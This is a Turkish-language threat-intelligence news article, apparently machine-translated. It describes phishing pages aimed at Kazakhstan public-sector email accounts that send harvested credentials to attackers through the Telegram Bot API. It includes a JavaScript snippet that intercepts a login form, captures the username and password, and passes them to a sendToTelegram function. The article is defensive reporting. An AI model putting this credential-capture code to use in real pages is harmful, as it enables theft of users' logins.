Siber güvenlik araştırmacıları, tehdit aktörlerinin Telegram’ın BOT API altyapısını giderek daha fazla kullandıkları, veri açığa çıkması için gizli bir iletişim kanalı olarak yararlandığı endişe verici bir eğilim belirlediler.
Bu sofistike saldırı metodolojisi, geleneksel güvenlik kontrollerini atlamak ve kalıcı komuta ve kontrol operasyonları oluşturmak için geleneksel kimlik avı tekniklerini meşru mesajlaşma hizmetleriyle birleştirir.
Kötü niyetli kampanyalar, çalınan verileri doğrudan saldırgan kontrollü telgraf botlarına iletmeden önce kullanıcı kimlik bilgilerini hasat etmek için hazırlanmış sahte oturum açma sayfalarını kullanır.
.webp)
Son araştırmalar, bu saldırıların özellikle yüksek değerli kuruluşları ve devlet kuruluşlarını hedeflediğini ve tehdit aktörlerinin, görünüşte meşru HTML sayfalarına gömülü JavaScript tabanlı kimlik bilgisi hasat mekanizmalarını konuşlandırdığını ortaya koydu.
Saldırılar, güvenilir hükümet alanlarını ve resmi hizmet portallarını yansıtan otantik görünümlü arayüzleri içeren sosyal mühendisliğe profesyonel bir yaklaşım göstermektedir.
Kötü amaçlı yazılım tasarımı, fırsatçı saldırılardan ziyade sistematik kimlik bilgisi hırsızlığına yönelik koordineli kampanyalar önermektedir.
Cybersec meraklısı Cocomelonc, Kazakistan kamu sektöründe keşfedilen kötü amaçlı HTML dosyalarının kapsamlı bir analizi ile bu tehdit varyantının ortaya çıktığını kaydetti.
Araştırma, saldırganların, saldırının güvenilirliğini artırmak için önceden doldurulmuş e-posta adreslerini içeren, devlet e-posta hesaplarını hedefleyen alana özgü kimlik avı sayfaları hazırladığı birden fazla örnek belirledi.
Bu kampanyalar, tehdit aktörlerinin amaçlanan kurbanları hakkında önceden keşif zekasına sahip olduklarını düşündüren sofistike hedefleme metodolojileri göstermektedir.
Operasyonel etki, başarılı uzlaşmalar tehdit aktörlerine yasal kimlik doğrulama yolları olan hassas organizasyon sistemlerine verdiği için basit kimlik doğrulama hırsızlığının ötesine uzanır.
İstihbarat analizi, bu saldırıların tehlikeye atılan ağlardaki yanal hareketi kolaylaştırdığını ve kalıcı erişim ve uzun süreli veri toplama faaliyetlerini sağladığını göstermektedir.
Telgraf tabanlı eksfiltrasyon mekanizması
Kötü amaçlı yazılımların temel işlevselliği, Telegram’ın mesajlaşma altyapısı aracılığıyla veri iletmeden önce kullanıcı girişini yakalayan JavaScript tabanlı bir kimlik bilgisi müdahale sistemine odaklanır.
Saldırı mekanizması, girilen kimlik bilgilerini yakalarken standart form gönderilmesini önleyen stratejik olarak hazırlanmış bir HTML formu aracılığıyla çalışır:-
document.getElementById('loginForm').addEventListener('submit', function(event) {
event.preventDefault();
var username = document.getElementById('username').value;
var password = document.getElementById('password').value;
var payload = `Username: ${username}\nPassword: ${password}`;
sendToTelegram(payload);
});Veri iletim süreci, saldırgan kontrollü kanallarla doğrudan iletişim kurarak XMLHTTPRequest çağrıları aracılığıyla Telegram’ın bot API’sini kullanır.
Uygulama, belirli bot jetonları ve sohbet tanımlayıcıları içerir ve çalınan kimlik bilgileri için özel eksfiltrasyon yolları oluşturur.
Geri kazanılan numunelerin analizi, tehdit aktörleri arasında standartlaştırılmış araç setleri öneren tutarlı API entegrasyon modellerini ortaya çıkarır.
Kötü amaçlı yazılım, meşru hizmet istismarı yoluyla operasyonel güvenliği korurken güvenilir iletimi sağlamak için hata işleme ve veri kodlama mekanizmalarını içerir.
Güvenlik araştırmacıları, iletişimin meşru altyapı kullanılarak şifreli kanallar aracılığıyla gerçekleştiği için bu saldırıların geleneksel algılama sistemlerine sunduğu zorluğu vurgulamaktadır.
Kuruluşlar, bu sofistike uygulama denemelerini tanımlamak için JavaScript davranış analizi ve ağ trafiği incelemesini içeren kapsamlı izleme stratejileri uygulamalıdır.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.